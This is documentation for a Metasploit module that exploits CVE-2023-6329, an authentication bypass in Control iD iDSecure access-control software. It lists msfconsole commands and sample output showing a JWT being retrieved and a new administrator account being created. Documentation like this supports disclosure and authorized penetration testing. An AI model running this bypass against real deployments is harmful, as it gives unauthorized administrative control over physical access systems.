cgranleese-r7
2.1 KiB
Vulnerable Application
This module exploits an improper access control vulnerability (CVE-2023-6329) in Control iD iDSecure <= v4.7.43.0. It allows an unauthenticated remote attacker to compute valid credentials and to add a new administrative user to the web interface of the product.
The advisory from Tenable is available here, which lists the affected version 4.7.32.0. According to the Solution section, the vendor has not responded to the contact attempts from Tenable. While creating this MSF module, the latest version available was 4.7.43.0, which was confirmed to be still vulnerable.
Testing
The software can be obtained from the vendor.
Deploy it by following the vendor's documentation.
Successfully tested on
- Control iD iDSecure v4.7.43.0 on Windows 10 22H2
- Control iD iDSecure v4.7.32.0 on Windows 10 22H2
Verification Steps
- Deploy Control iD iDSecure v4.7.43.0
- Start
msfconsole use auxiliary/admin/http/idsecure_auth_bypassset RHOSTS <IP>run- A new administrative user should have been added to the web interface of the product.
Options
NEW_USER
The name of the new administrative user.
NEW_PASSWORD
The password of the new administrative user.
Scenarios
Running the module against Control iD iDSecure v4.7.43.0 should result in an output similar to the following:
msf > use auxiliary/admin/http/idsecure_auth_bypass
msf auxiliary(admin/http/idsecure_auth_bypass) > set RHOSTS 192.168.137.196
[*] Running module against 192.168.137.196
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version retrieved: 4.7.43.0
[+] The target appears to be vulnerable.
[+] Retrieved passwordRandom: <redacted>
[+] Retrieved serial: <redacted>
[*] Created passwordCustom: <redacted>
[+] Retrieved JWT accessToken: <redacted>
[+] New user 'h4x0r:Sup3rS3cr3t!' was successfully added.
[+] Login at: https://192.168.137.196:30443/#/login
[*] Auxiliary module execution completed